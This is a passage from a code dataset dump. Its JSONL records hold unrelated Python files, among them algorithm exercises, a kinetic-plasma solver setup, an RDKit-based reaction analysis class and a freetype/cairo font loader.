problem')\n","repo_name":"antunesleo/thoughts-api","sub_path":"thoughts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25888935061","text":"import cv2\n\n# Detection History\nHISTORY_WINDOW = 60 # in seconds\nHISTORY_FREQUENCY = 0.5 # in seconds, the frequency the history is updated + image is changed\n\n# Stable Detections\nAVERAGE_WINDOW = 5 # in seconds\n\n# Display\nBBOX_COLOR = (255,0,0) # B, G, R\nCOUNT_COLOR = (0,0, 255) # B, G, R\nCONFIDENCE_COLOR = (255,255,255) # B, G, R\n\nFONT = cv2.FONT_HERSHEY_SIMPLEX\nFONT_SIZE = 0.5\nTEXT_THICKNESS = 1\n","repo_name":"OSU-AIClub/Object-Detection-Project","sub_path":"opencv_deployment/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"21142109890","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nsys.setrecursionlimit(10**9)\n\ndx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ndef dfs(x, y):\n if visited[x][y]: return visited[x][y]\n visited[x][y] = 1\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n if (0 <= nx < n) and (0 <= ny < n) and board[x][y] < board[nx][ny]:\n visited[x][y] = max(visited[x][y], dfs(nx, ny)+1)\n return visited[x][y]\n\n\nn = int(input())\nboard = [list(map(int, input().split())) for _ in range(n)]\nvisited = [[0]*n for _ in range(n)]\n\nans = 0\nfor i in range(n):\n for j in range(n):\n ans = max(ans, dfs(i, j))\n\nprint(ans)\n","repo_name":"cpwoo/CodeTest","sub_path":"Python/boj/graph/1937.py","file_name":"1937.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2612069098","text":"import numpy as np\nimport arrayfire as af \n\nclass config:\n pass\n\ndef set(params):\n \"\"\"\n Used to set the parameters that are used in the simulation\n\n Parameters:\n -----------\n params : Name of the file that contains the parameters for the simulation run\n is passed to this function. \n\n Output:\n -------\n config : Object whose attributes contain all the simulation parameters. This is\n passed to the remaining solver functions.\n \"\"\"\n \n config.mass_particle = params.constants['mass_particle']\n config.boltzmann_constant = params.constants['boltzmann_constant']\n\n config.rho_background = params.background_electrons['rho']\n config.temperature_background = params.background_electrons['temperature']\n config.vel_bulk_background = params.background_electrons['vel_bulk']\n\n config.pert_x_real = params.perturbation['pert_x_real']\n config.pert_x_imag = params.perturbation['pert_x_imag']\n config.k_x = params.perturbation['k_x']\n\n config.N_vel_x = params.size['N_vel_x']\n config.N_x = params.size['N_x']\n config.vel_x_max = params.size['vel_x_max']\n config.N_ghost_x = params.size['N_ghost_x']\n config.left_boundary = params.size['left_boundary']\n config.right_boundary = params.size['right_boundary']\n\n config.final_time = params.time['final_time']\n config.dt = params.time['dt']\n \n config.fields_enabled = params.EM_fields['enabled']\n config.charge_particle = params.EM_fields['charge_particle']\n\n config.collisions_enabled = params.collisions['enabled']\n config.collision_operator = params.collisions['collision_operator']\n config.tau = params.collisions['tau']\n\n return config\n\ndef calculate_x(config):\n \"\"\"\n Returns the 2D array of x which is used in the computations of the Cheng-Knorr code.\n\n Parameters:\n -----------\n config : Object config which is obtained by set() is passed to this file\n\n Output:\n -------\n x : Array holding the values of x tiled along axis 1\n \"\"\"\n N_x = config.N_x\n N_vel_x = config.N_vel_x\n N_ghost_x = config.N_ghost_x\n\n left_boundary = config.left_boundary\n right_boundary = config.right_boundary\n\n x = np.linspace(left_boundary, right_boundary, N_x)\n dx = x[1] - x[0]\n\n x_ghost_left = np.linspace(-(N_ghost_x)*dx + left_boundary, left_boundary - dx, N_ghost_x)\n x_ghost_right = np.linspace(right_boundary + dx, right_boundary + N_ghost_x*dx , N_ghost_x)\n\n x = np.concatenate([x_ghost_left, x, x_ghost_right])\n x = af.Array.as_type(af.to_array(x), af.Dtype.f64)\n x = af.tile(x, 1, N_vel_x)\n\n af.eval(x)\n return x\n\ndef calculate_vel_x(config):\n \"\"\"\n Returns the 2D array of vel_x which is used in the computations of the Cheng-Knorr code.\n\n Parameters:\n -----------\n config : Object config which is obtained by set() is passed to this file\n\n Output:\n -------\n x : Array holding the values of vel_x tiled along axis 0\n \"\"\"\n N_x = config.N_x\n N_vel_x = config.N_vel_x\n N_ghost_x = config.N_ghost_x\n vel_x_max = config.vel_x_max\n\n vel_x = np.linspace(-vel_x_max, vel_x_max, N_vel_x)\n vel_x = af.Array.as_type(af.to_array(vel_x), af.Dtype.f64)\n vel_x = af.tile(af.reorder(vel_x), N_x + 2*N_ghost_x, 1)\n\n af.eval(vel_x)\n return vel_x\n\n\ndef f_background(config):\n \"\"\"\n Returns the value of f_background, depending on the parameters set in \n the config class\n\n Parameters:\n -----------\n config : Class config which is obtained by set() is passed to this file\n\n Output:\n -------\n f_background : Array which contains the values of f_background at different values\n of vel_x and x\n \"\"\"\n \n mass_particle = config.mass_particle\n boltzmann_constant = config.boltzmann_constant\n\n rho_background = config.rho_background\n temperature_background = config.temperature_background\n vel_x = calculate_vel_x(config)\n\n f_background = rho_background * np.sqrt(mass_particle/(2*np.pi*boltzmann_constant*temperature_background)) * \\\n af.exp(-mass_particle*vel_x**2/(2*boltzmann_constant*temperature_background))\n\n af.eval(f_background)\n return f_background\n\ndef f_initial(config):\n \"\"\"\n Returns the value of f_initial, depending on the parameters set in \n the config object\n\n Parameters:\n -----------\n config : Object config which is obtained by set() is passed to this file\n\n Output:\n -------\n f_initial : Array which contains the values of f_initial at different values\n of vel_x and x\n \"\"\"\n \n mass_particle = config.mass_particle\n boltzmann_constant = config.boltzmann_constant\n\n rho_background = config.rho_background\n temperature_background = config.temperature_background\n vel_x = calculate_vel_x(config)\n\n pert_x_real = config.pert_x_real\n pert_x_imag = config.pert_x_imag\n k_x = config.k_x\n\n x = calculate_x(config)\n rho = rho_background + (pert_x_real * af.cos(2*np.pi*x) - pert_x_imag * af.sin(2*np.pi*x))\n\n f_initial = rho * np.sqrt(mass_particle/(2*np.pi*boltzmann_constant*temperature_background)) * \\\n af.exp(-mass_particle*vel_x**2/(2*boltzmann_constant*temperature_background))\n\n af.eval(f_initial)\n return f_initial\n\ndef time_array(config):\n \"\"\"\n Returns the value of the time_array at which we solve for in the simulation. \n The time_array is set depending on the options which have been mention in config.\n\n Parameters:\n -----------\n config : Class config which is obtained by set() is passed to this file\n\n Output:\n -------\n time_array : Array that contains the values of time at which the \n simulation evaluates the physical quantities. \n\n \"\"\"\n final_time = config.final_time\n dt = config.dt\n\n time_array = np.arange(0, final_time + dt, dt)\n\n return time_array","repo_name":"mchandra/Boltzmann-Solver","sub_path":"cks/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19828349003","text":"#-*-coding:utf8;-*-\n#qpy:3\n#qpy:console\n\n#data = {'A':[[],[]], 'B':[[],[]], 'C':[['A', 'B'],[]], 'D':[['C'],[]]}\n\n# ошибка Failed test 2: wrong answer\n# необходимо добавить добавление необъявленного родителя в словарь с данными\n# все еще Failed test 2: wrong answer\n# бьютифицировали список\n# все еще Failed test 2: wrong answer\n# попробовали добавить вывод \"Yes\" при проверке равенства предка и потомка, даже если они не в списке\n# все еще Failed test 2: wrong answer \n\ndata = {}\nlost = []\n\ndef getanc(k):\n if data[k][0] != []:\n # если список родителей не пуст\n for p in data[k][0]:\n # перебираем родителей\n if p in data.keys():\n # если родитель был объявлен ранее\n if data[p][1] == []:\n # и если у родителя пуст список предков\n getanc(p)\n # выполняем эту функцию для родителя\n data[k][1].extend(data[p][1])\n # добавляем предков родителя в свой список предков\n \n else:\n # иначе, то есть когда родитель не был объявлен ранее\n if p not in lost:\n # если родителя еще нет в потеряшках\n lost.append(p)\n # добавляем его в потеряшки\n \n data[k][1].append(p)\n # добавляем такого родителя в предки\n \n if k not in data[k][1]:\n data[k][1].append(k)\n #и себя добавляем в список своих предков\n else:\n # иначе, то есть если список родителей пуст\n data[k][1].append(k)\n # добавляем себя в список своих предков\n\n\nn = int(input())\n\nfor i in range(n):\n line = input().strip()\n if \":\" not in line:\n data[line] = [[],[]]\n else: #необходимо добавить добавление в список родителей по известному ключу\n line = [j for j in line.split(\" : \")]\n line[0] = line[0].strip()\n if \" \" in line[1]:\n line[1] = [j for j in line[1].split()]\n line[1] = list(map(lambda silly: silly.strip(), line[1]))\n else:\n line[1] = line[1].strip()\n \n if line[0] in data.keys():\n data[line[0]][0].extend(line[1])\n else:\n data[line[0]] = [[],[]]\n data[line[0]][0].extend(line[1])\n #print(data)\n\nfor i in data.keys():\n getanc(i)\n\nfor i in lost:\n data[i] = [[],[i]]\n\n#print(data)\n\nq = int(input())\n\nfor i in range(q):\n line = [j for j in input().strip().split()]\n line = list(map(lambda sin: sin.strip(), line))\n if line[0] in data.keys() and line[1] in data.keys():\n if line[0] in data[line[1]][1]:\n print('Yes')\n else:\n print('No')\n else:\n #if line[0] == line[1]:\n # проводим эксперимент - если ключей нет в словаре, но они одинаковые\n #print('Yes')\n print('No')\n\n\n\n'''\nlst_mro = ['G : F','A','B : A','C : A','D : B C','E : D','F : D','X','Y : X A','Z : X','V : Z Y','W : V']\nlst_q = ['A G','A Z','A W','X W','X QWE','A X','X X','1 1']\n\n'''\n'''\nlst_mro = ['A : B C D G H','B : C E G H K L','C : E D H K L','E : D F K L','D : G H','F : K','G : F','H : L','K : H L','L']\nlst_q = ['K D','D A','G D','H A','E E','H G','E L','B D','D L','D G','D E','A F','A C','K A','A H','K D','H B','K B','D L','G G','A H','K L','G E','B A','C K','K L','C L','H L','G C','D D','C G','E A','F K','B G','H L','L F','H G','D A']\nlst_res = ['Yes','Yes','Yes','Yes','Yes','Yes','No','No','No','No','Yes','No','No','Yes','No','Yes','Yes','Yes','No','Yes','No','No','Yes','Yes','No','No','No','Yes','Yes','No','Yes','No','No','No','Yes','Yes','Yes','No']\n\nfor i in lst_mro:\n if \":\" not in i:\n data[i] = [[],[]]\n else:\n i = [j for j in i.split(\" : \")]\n if \" \" in i[1]:\n i[1] = [j for j in i[1].split()]\n data[i[0]] = [[],[]]\n data[i[0]][0].extend(i[1])\n print(data)\n\n\nfor i in data.keys():\n getanc(i)\n\nfor i in lost:\n data[i] = [[],[i]]\n\nprint(data)\n\nresults = []\n\nfor i in lst_q:\n i = i.split()\n if i[0] in data.keys() and i[1] in data.keys():\n if i[0] in data[i[1]][1]:\n print('Yes')\n results.append('Yes')\n else:\n print('No')\n results.append('No')\n else:\n print(\"No\")\n results.append('No')\n\nfrom itertools import compress\n\nif results == lst_res:\n print(\"Test correct\")\nelse:\n print(\"Test incorrect\")\n print(list(map(lambda i: print(results[i], lst_res[i], lst_q[i], sep = \" \"), range(len(results)))))\n'''","repo_name":"Miffka/Python2","sub_path":"Python2_14_task4_try2.py","file_name":"Python2_14_task4_try2.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31759238669","text":"import sys\n\n\nclass stack():\n def __init__(self):\n self.stacklist = []\n\n def pushX(self, x):\n self.stacklist.append(x)\n\n def size(self):\n return len(self.stacklist)\n\n def empty(self):\n if self.size() == 0:\n return 1\n else:\n return 0\n\n def pop(self):\n if self.empty():\n print(-1)\n else:\n print(self.stacklist.pop())\n\n def top(self):\n if self.empty():\n print(-1)\n else:\n print(self.stacklist[-1])\n\n\ns = stack()\n\nfor _ in range(int(sys.stdin.readline())):\n r = sys.stdin.readline().split()\n\n if r[0] == 'push':\n s.pushX(r[1])\n elif r[0] == 'top':\n s.top()\n elif r[0] == 'size':\n print(s.size())\n elif r[0] == 'empty':\n print(s.empty())\n elif r[0] == 'pop':\n s.pop()\n","repo_name":"goodhonestgood/improve","sub_path":"파이썬/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8765002936","text":"\"\"\"\nThe set [1,2,3,...,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order, we get the following sequence for n = 3:\n\n \"123\"\n \"132\"\n \"213\"\n \"231\"\n \"312\"\n \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote:\n\n Given n will be between 1 and 9 inclusive.\n Given k will be between 1 and n! inclusive.\n\"\"\"\n\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n nums = list(range(1,n+1))\n res = \"\"\n \n for i in range(n, 0, -1):\n digits = (k-1)//factorial(i-1)\n k -= digits*factorial(i-1)\n res = res + str(nums[digits])\n nums.remove(nums[digits])\n \n return res ","repo_name":"pkdism/leetcode","sub_path":"june-leetcoding-challenge/d20-permutation-sequence.py","file_name":"d20-permutation-sequence.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28310545624","text":"def unique_array(lst):\n ans = []\n for i in range(len(lst)):\n check = False\n for j in range(len(lst)):\n if lst[i] == lst[j]:\n if i != j:\n check = True\n if check != 1:\n ans.append(lst[i])\n return ans\n\nn = int(input())\nl = list()\nfor i in range(n):\n x = int(input())\n l.append(x)\nprint(unique_array(l))","repo_name":"idonaiky/pp2","sub_path":"week 3/functions1.md/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13838700708","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\nn=int(input())\r\nINF=int(1e9)\r\nside=[]\r\narr=[0]\r\ndp=[INF]*300001\r\ndp[0]=0\r\nfor i in range(1, 122):\r\n side.append(i*(i+1)//2)\r\nfor i in range(len(side)):\r\n arr.append(arr[i]+side[i])\r\nfor i in range(1, 300001):\r\n for j in range(1, len(arr)):\r\n t=arr[j]\r\n if i>\")\n except ValueError as exc:\n raise ValueError('Not a valid reaction smiles, missing \">>\".') from exc\n return cls.from_reactant_and_product_smiles(rsmi=rsmi, psmi=psmi)\n\n def init_reactant_product(\n self,\n reactant: Union[List[RDKitMol], RDKitMol],\n product: Union[List[RDKitMol], RDKitMol],\n ):\n \"\"\" \"\"\"\n if isinstance(reactant, list):\n self.reactant = reactant\n self.reactant_complex = self._combine_multiple_mols(reactant)\n else:\n self.reactant = list(reactant.GetMolFrags(asMols=True))\n self.reactant_complex = reactant\n if isinstance(product, list):\n self.product = product\n self.product_complex = self._combine_multiple_mols(product)\n else:\n self.product = list(product.GetMolFrags(asMols=True))\n self.product_complex = product\n\n @staticmethod\n def _combine_multiple_mols(mols: List[RDKitMol]) -> RDKitMol:\n \"\"\"\n Combine multiple molecules into a complex.\n\n Args:\n mols (List[RDKitMol]): The list of molecules to combine.\n \"\"\"\n return reduce(lambda x, y: x.CombineMol(y), mols)\n\n @property\n def is_num_atoms_balanced(self) -> bool:\n \"\"\"\n Whether the number of atoms in the reactant(s) and product(s) are balanced.\n \"\"\"\n return self.reactant_complex.GetNumAtoms() == self.product_complex.GetNumAtoms()\n\n @property\n def reactant_element_count(self) -> dict:\n \"\"\"\n The element count in the reactant(s) and product(s).\n \"\"\"\n return dict(Counter(self.reactant_complex.GetElementSymbols()))\n\n @property\n def product_element_count(self) -> dict:\n \"\"\"\n The element count in the reactant(s) and product(s).\n \"\"\"\n return dict(Counter(self.product_complex.GetElementSymbols()))\n\n @property\n def is_element_balanced(self) -> bool:\n \"\"\"\n Whether the elements in the reactant(s) and product(s) are balanced.\n \"\"\"\n if self.is_num_atoms_balanced:\n return Counter(self.reactant_complex.GetElementSymbols()) == Counter(\n self.product_complex.GetElementSymbols()\n )\n return False\n\n @property\n def is_charge_balanced(self) -> bool:\n \"\"\"\n Whether the charge in the reactant(s) and product(s) are balanced.\n \"\"\"\n return (\n self.reactant_complex.GetFormalCharge()\n == self.product_complex.GetFormalCharge()\n )\n\n @property\n def is_mult_equal(self) -> bool:\n \"\"\"\n Whether the spin multiplicity in the reactant(s) and product(s) are equal.\n \"\"\"\n return (\n self.reactant_complex.GetSpinMultiplicity()\n == self.product_complex.GetSpinMultiplicity()\n )\n\n @property\n def num_atoms(self) -> bool:\n \"\"\"\n The number of atoms involved in the reactant(s) and product(s).\n \"\"\"\n assert (\n self.is_num_atoms_balanced\n ), \"The number of atoms in the reactant(s) and product(s) are not balanced.\"\n return self.reactant_complex.GetNumAtoms()\n\n @property\n def num_reactants(self) -> int:\n \"\"\"\n The number of reactants.\n \"\"\"\n return len(self.reactant)\n\n @property\n def num_products(self) -> int:\n \"\"\"\n The number of products.\n \"\"\"\n return len(self.product)\n\n def require_bond_analysis(func):\n \"\"\"\n Timer decorator for recording the time of a function.\n\n Args:\n func (function): The function to be decorated.\n\n Returns:\n function: The decorated function.\n \"\"\"\n wraps(func)\n\n def wrapper(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except AttributeError:\n (\n self._formed_bonds,\n self._broken_bonds,\n self._changed_bonds,\n ) = get_all_changing_bonds(\n r_mol=self.reactant_complex,\n p_mol=self.product_complex,\n )\n return func(self, *args, **kwargs)\n\n return wrapper\n\n def bond_analysis(self):\n \"\"\"\n Perform bond analysis on the reaction.\n \"\"\"\n (\n self._formed_bonds,\n self._broken_bonds,\n self._changed_bonds,\n ) = get_all_changing_bonds(\n r_mol=self.reactant_complex,\n p_mol=self.product_complex,\n )\n\n @property\n @require_bond_analysis\n def num_broken_bonds(self) -> int:\n \"\"\"\n The number of bonds broken in the reaction.\n \"\"\"\n return len(self._broken_bonds)\n\n @property\n @require_bond_analysis\n def num_formed_bonds(self) -> int:\n \"\"\"\n The number of bonds broken in the reaction.\n \"\"\"\n return len(self._formed_bonds)\n\n @property\n @require_bond_analysis\n def num_changed_bonds(self) -> int:\n \"\"\"\n The number of bonds with bond order changed in the reaction.\n \"\"\"\n return len(self._changed_bonds)\n\n @property\n @require_bond_analysis\n def broken_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken in the reaction.\n \"\"\"\n return self._broken_bonds\n\n @property\n @require_bond_analysis\n def formed_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds formed in the reaction.\n \"\"\"\n return self._formed_bonds\n\n @property\n @require_bond_analysis\n def changed_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds with bond order changed in the reaction.\n \"\"\"\n return self._changed_bonds\n\n @property\n @require_bond_analysis\n def active_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken and formed in the reaction.\n \"\"\"\n return self._broken_bonds + self._formed_bonds\n\n @property\n @require_bond_analysis\n def involved_bonds(self) -> List[Tuple[int]]:\n \"\"\"\n The bonds broken and formed in the reaction.\n \"\"\"\n return self._broken_bonds + self._formed_bonds + self._changed_bonds\n\n @property\n @require_bond_analysis\n def active_atoms(self) -> List[int]:\n \"\"\"\n The atoms involved in the bonds broken and formed in the reaction.\n \"\"\"\n return list(set(chain(*self.active_bonds)))\n\n @property\n @require_bond_analysis\n def involved_atoms(self) -> List[int]:\n \"\"\"\n The atoms involved in the bonds broken and formed in the reaction.\n \"\"\"\n return list(set(chain(*self.involved_bonds)))\n\n @property\n def is_resonance_corrected(self) -> bool:\n \"\"\"\n Whether the reaction is resonance corrected.\n \"\"\"\n return getattr(self, '_is_resonance_corrected', False)\n\n def apply_resonance_correction(\n self,\n inplace: bool = True,\n ) -> \"Reaction\":\n \"\"\"\n Apply resonance correction to the reactant and product complexes.\n \"\"\"\n if self.is_resonance_corrected:\n # Avoid applying resonance correction multiple times\n # TODO: add a auto-clean somewhere to update this flag\n # TODO: when the reactant and product are changed\n return self\n try:\n rcps = generate_resonance_structures(\n self.reactant_complex,\n )\n except BaseException:\n rcps = [self.reactant_complex]\n try:\n pcps = generate_resonance_structures(\n self.product_complex,\n )\n except BaseException:\n pcps = [self.product_complex]\n\n n_changed_bonds = self.num_changed_bonds\n rmol = self.reactant_complex\n pmol = self.product_complex\n\n modify_flag = False\n for rcp, pcp in product(rcps, pcps):\n _, _, new_changed_bonds = get_all_changing_bonds(rcp, pcp)\n if len(new_changed_bonds) < n_changed_bonds:\n modify_flag = True\n n_changed_bonds = len(new_changed_bonds)\n rmol, pmol = rcp, pcp\n\n if modify_flag:\n if inplace:\n self.init_reactant_product(rmol, pmol)\n self.bond_analysis()\n self._is_resonance_corrected = True\n return self\n else:\n # todo: check if ts has 3d coordinates\n new_rxn = Reaction(rmol, pmol, ts=self.ts)\n new_rxn._is_resonance_corrected = True\n return new_rxn\n\n self._is_resonance_corrected = True\n return self\n\n def get_reverse_reaction(self):\n \"\"\"\n Get the reverse reaction.\n \"\"\"\n return Reaction(self.product_complex, self.reactant_complex, ts=self.ts)\n\n def to_smiles(\n self,\n remove_hs: bool = False,\n remove_atom_map: bool = False,\n **kwargs,\n ) -> str:\n \"\"\"\n Convert the reaction to reaction SMILES.\n \"\"\"\n rsmi = self.reactant_complex.ToSmiles(\n removeAtomMap=remove_atom_map, removeHs=remove_hs, **kwargs\n )\n psmi = self.product_complex.ToSmiles(\n removeAtomMap=remove_atom_map, removeHs=remove_hs, **kwargs\n )\n return f\"{rsmi}>>{psmi}\"\n\n def make_ts(self):\n \"\"\"\n Make the transition state of the reaction based on the reactant and product.\n This method assumes that the reactant complex and product complex are atom-mapped\n already.\n \"\"\"\n self.ts = self.reactant_complex.AddRedundantBonds(self.formed_bonds)\n return self.ts\n\n def _update_ts(self):\n \"\"\"\n Update the transition state of the reaction. Assign reaction, reactant,\n and product attributes to the transition state based on the reaction.\n \"\"\"\n if not hasattr(self._ts, \"reaction\"):\n self._ts.reaction = self\n if not hasattr(self._ts, \"reactant\"):\n self._ts.reactant = self.reactant_complex\n if not hasattr(self._ts, \"product\"):\n self._ts.product = self.product_complex\n\n @property\n def ts(self):\n \"\"\"\n The transition state of the reaction.\n \"\"\"\n if not hasattr(self, \"_ts\"):\n self.make_ts()\n self._update_ts()\n return self._ts\n\n @ts.setter\n def ts(self, mol: \"RDKitMol\"):\n \"\"\"\n Set the transition state of the reaction.\n \"\"\"\n self._ts = mol\n self._update_ts()\n\n def to_rdkit_reaction(self) -> rdChemReactions.ChemicalReaction:\n \"\"\"\n Convert the reaction to RDKit ChemicalReaction.\n \"\"\"\n return rdChemReactions.ReactionFromSmarts(self.to_smiles(), useSmiles=True)\n\n def draw_2d(\n self,\n font_scale: float = 1.0,\n highlight_by_reactant: bool = True,\n ) -> str:\n \"\"\"\n This is a modified version of the drawReaction2D function in RDKit.\n\n Args:\n font_scale (float, optional): The font scale for the atom map number. Defaults to 1.0.\n highlightByReactant (bool, optional): Whether to highlight the reactant(s) or product(s). Defaults to True.\n\n Returns:\n str: The SVG string. To display the SVG, use IPython.display.SVG(svg_string).\n \"\"\"\n\n def move_atommaps_to_notes(mol):\n for atom in mol.GetAtoms():\n if atom.GetAtomMapNum():\n atom.SetProp(\"atomNote\", str(atom.GetAtomMapNum()))\n\n rxn = self.to_rdkit_reaction()\n\n # move atom maps to be annotations:\n for mol in rxn.GetReactants():\n move_atommaps_to_notes(mol)\n for mol in rxn.GetProducts():\n move_atommaps_to_notes(mol)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(800, 300)\n d2d.drawOptions().annotationFontScale = font_scale\n d2d.DrawReaction(rxn, highlightByReactant=highlight_by_reactant)\n\n d2d.FinishDrawing()\n\n return d2d.GetDrawingText()\n\n def has_same_reactants(\n self,\n other: \"Reaction\",\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same reactants as the other reaction.\n\n Args:\n other (Reaction): The other reaction to compare.\n\n Returns:\n bool: Whether the reaction has the same reactants as the other reaction.\n \"\"\"\n return self.is_same_reactants(other.reactant_complex, resonance=resonance)\n\n def is_same_reactants(\n self,\n reactants: Union[List[RDKitMol], RDKitMol],\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same reactants as the given reactants or reactant complex.\n\n Args:\n reactant (Union[List[RDKitMol], RDKitMol]): The reactants or reactant complex to compare.\n resonance (bool, optional): Whether to consider resonance structures. Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction has the same reactants as the given reactants or reactant complex.\n \"\"\"\n return is_same_complex(self.reactant_complex, reactants, resonance=resonance)\n\n def has_same_products(\n self,\n other: \"Reaction\",\n resonance: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction has the same products as the other reaction.\n\n Args:\n other (Reaction): The other reaction to compare.\n\n Returns:\n bool: Whether the reaction has the same products as the other reaction.\n \"\"\"\n return self.is_same_products(other.product_complex, resonance=resonance)\n\n def is_same_products(\n self,\n products: Union[List[RDKitMol], RDKitMol],\n resonance: bool = False,\n ):\n \"\"\"\n Check if the reaction has the same products as the given products or product complex.\n\n Args:\n product (Union[List[RDKitMol], RDKitMol]): The products or product complex to compare.\n resonance (bool, optional): Whether to consider resonance structures. Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction has the same products as the given products or product complex.\n \"\"\"\n return is_same_complex(self.product_complex, products, resonance=resonance)\n\n def is_equivalent(\n self,\n reaction: \"Reaction\",\n both_directions: bool = False,\n ) -> bool:\n \"\"\"\n Check if the reaction is equivalent to the given reaction.\n\n Args:\n reaction (Reaction): The reaction to compare.\n both_directions (bool, optional): Whether to check both directions. Defaults to ``False``.\n\n Returns:\n bool: Whether the reaction is equivalent to the given reaction.\n \"\"\"\n equiv = is_equivalent_reaction(self, reaction)\n\n if both_directions and not equiv:\n tmp_reaction = self.get_reverse_reaction()\n equiv = is_equivalent_reaction(tmp_reaction, reaction)\n\n return equiv\n","repo_name":"xiaoruiDong/RDMC","sub_path":"rdmc/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":18183,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"22396510834","text":"#Name: Nick Bear\n#Date: 5/21/2023\n#Assignment: Merge K Sorted Lists\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass MergeKLists:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n\n #if the list is empty, return null\n if not lists or len(lists) == 0:\n return None\n\n #while there are k lists where k > 1\n while len(lists) > 1:\n\n #create an empty temp variable\n mergedList = []\n\n #for every other list in lists, merge it and its neighbor and then add it to the temp variable\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i + 1] if i+1 < len(lists) else None\n mergedList.append(self.mergeList(l1, l2))\n \n #update lists variable to hold newly sorted lists cut in half\n lists = mergedList\n\n return lists[0]\n\n \n #LeetCode Easy Merge List function\n def mergeList(self, l1, l2):\n ans = ListNode()\n curr = ans\n\n while(l1 and l2):\n if (l1.val > l2.val):\n curr.next = l2\n l2 = l2.next\n else:\n curr.next = l1\n l1 = l1.next\n\n curr = curr.next\n \n if(l1):\n curr.next = l1\n \n if(l2):\n curr.next = l2\n \n return ans.next\n","repo_name":"NicholasBear97/leetcode-solutions","sub_path":"LinkedList/MergeKLists.py","file_name":"MergeKLists.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14100117748","text":"\"\"\"\n http://cairographics.org/freetypepython/\n\"\"\"\n\nimport ctypes\nimport cairo\n\nCAIRO_STATUS_SUCCESS = 0\nFT_Err_Ok = 0\n\nclass PycairoContext(ctypes.Structure):\n _fields_ = [('PyObject_HEAD', ctypes.c_byte * object.__basicsize__),\n ('ctx', ctypes.c_void_p),\n ('base', ctypes.c_void_p)]\n\nclass FontLoader(object):\n \"\"\"docstring for FontLoader\"\"\"\n\n _freetype_so = None\n _cairo_so = None\n _ft_lib = None\n _surface = None\n\n def __init__(self):\n super(FontLoader, self).__init__()\n\n # find shared objects\n self._freetype_so = ctypes.CDLL ('libfreetype.so.6')\n self._cairo_so = ctypes.CDLL ('libcairo.so.2')\n\n self._cairo_so.cairo_ft_font_face_create_for_ft_face.restype = ctypes.c_void_p\n self._cairo_so.cairo_ft_font_face_create_for_ft_face.argtypes = [ ctypes.c_void_p, ctypes.c_int ]\n self._cairo_so.cairo_set_font_face.argtypes = [ ctypes.c_void_p, ctypes.c_void_p ]\n self._cairo_so.cairo_font_face_status.argtypes = [ ctypes.c_void_p ]\n self._cairo_so.cairo_status.argtypes = [ ctypes.c_void_p ]\n\n # initialize freetype\n self._ft_lib = ctypes.c_void_p ()\n if FT_Err_Ok != self._freetype_so.FT_Init_FreeType (ctypes.byref (self._ft_lib)):\n raise RuntimeError('Error initialising FreeType library.')\n\n self._surface = cairo.ImageSurface (cairo.FORMAT_A8, 0, 0)\n\n def cairo_font_face_from_file(self, filename, faceindex=0, loadoptions=0):\n # create freetype face\n ft_face = ctypes.c_void_p()\n cairo_ctx = cairo.Context (self._surface)\n cairo_t = PycairoContext.from_address(id(cairo_ctx)).ctx\n\n if FT_Err_Ok != self._freetype_so.FT_New_Face (self._ft_lib, filename, faceindex, ctypes.byref(ft_face)):\n raise Exception('Error creating FreeType font face for ' + filename)\n\n # create cairo font face for freetype face\n cr_face = self._cairo_so.cairo_ft_font_face_create_for_ft_face (ft_face, loadoptions)\n if CAIRO_STATUS_SUCCESS != self._cairo_so.cairo_font_face_status (cr_face):\n raise Exception('Error creating cairo font face for ' + filename)\n\n self._cairo_so.cairo_set_font_face (cairo_t, cr_face)\n if CAIRO_STATUS_SUCCESS != 